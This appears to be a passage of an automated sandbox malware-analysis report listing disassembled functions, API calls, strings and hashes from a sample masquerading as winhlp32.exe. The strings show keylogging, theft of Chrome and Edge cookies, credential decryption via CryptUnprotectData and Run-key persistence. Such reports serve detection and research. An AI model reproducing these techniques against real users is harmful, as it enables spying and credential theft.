                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID:
                                    • API String ID: 1852769593-0
                                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                    • _free.LIBCMT ref: 004482D3
                                    • _free.LIBCMT ref: 004482FA
                                    • SetLastError.KERNEL32(00000000), ref: 00448307
                                    • SetLastError.KERNEL32(00000000), ref: 00448310
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                    • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 004509D4
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 004509E6
                                    • _free.LIBCMT ref: 004509F8
                                    • _free.LIBCMT ref: 00450A0A
                                    • _free.LIBCMT ref: 00450A1C
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 00444066
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00444078
                                    • _free.LIBCMT ref: 0044408B
                                    • _free.LIBCMT ref: 0044409C
                                    • _free.LIBCMT ref: 004440AD
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                    • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                    • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                    • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _strpbrk.LIBCMT ref: 0044E738
                                    • _free.LIBCMT ref: 0044E855
                                      • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                      • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                      • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                    • String ID: *?$.
                                    • API String ID: 2812119850-3972193922
                                    • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                    • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                    • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                    • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: !D@$NG
                                    • API String ID: 180926312-2721294649
                                    • Opcode ID: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                    • Opcode Fuzzy Hash: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: `#D$`#D
                                    • API String ID: 885266447-2450397995
                                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\winhlp32.exe,00000104), ref: 00443475
                                    • _free.LIBCMT ref: 00443540
                                    • _free.LIBCMT ref: 0044354A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\winhlp32.exe
                                    • API String ID: 2506810119-3669941681
                                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                    • GetLastError.KERNEL32 ref: 0044B931
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                    • String ID: PkGNG
                                    • API String ID: 2456169464-263838557
                                    • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                    • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                    • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                    • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "$0NG
                                    • API String ID: 368326130-3219657780
                                    • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                    • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcslen.LIBCMT ref: 004162F5
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wcslen$CloseCreateValue
                                    • String ID: !D@$okmode$PG
                                    • API String ID: 3411444782-3370592832
                                    • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                    • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                    Strings
                                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                    • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                    Strings
                                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                    • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                    • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                    • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                    • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                    • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTimewsprintf
                                    • String ID: Offline Keylogger Started
                                    • API String ID: 465354869-4114347211
                                    • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                    • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                    • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                    • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                    • API String ID: 481472006-3277280411
                                    • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                    • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                    • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                    • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: CryptUnprotectData$crypt32
                                    • API String ID: 2574300362-2380590389
                                    • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                    • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                    • GetLastError.KERNEL32 ref: 0044C296
                                    • __dosmaperr.LIBCMT ref: 0044C29D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastPointer__dosmaperr
                                    • String ID: PkGNG
                                    • API String ID: 2336955059-263838557
                                    • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                    • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                    • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                    • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection Timeout
                                    • API String ID: 2055531096-499159329
                                    • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                    • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                    • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                    • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                    • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                    • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                    • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                    • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FormatFreeLocalMessage
                                    • String ID: @J@$PkGNG
                                    • API String ID: 1427518018-1416487119
                                    • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                    • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                    • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                    • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 0041384D
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 1818849710-1051519024
                                    • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                    • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                    • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                    • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                    • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                    • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Control Panel\Desktop
                                    • API String ID: 1818849710-27424756
                                    • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
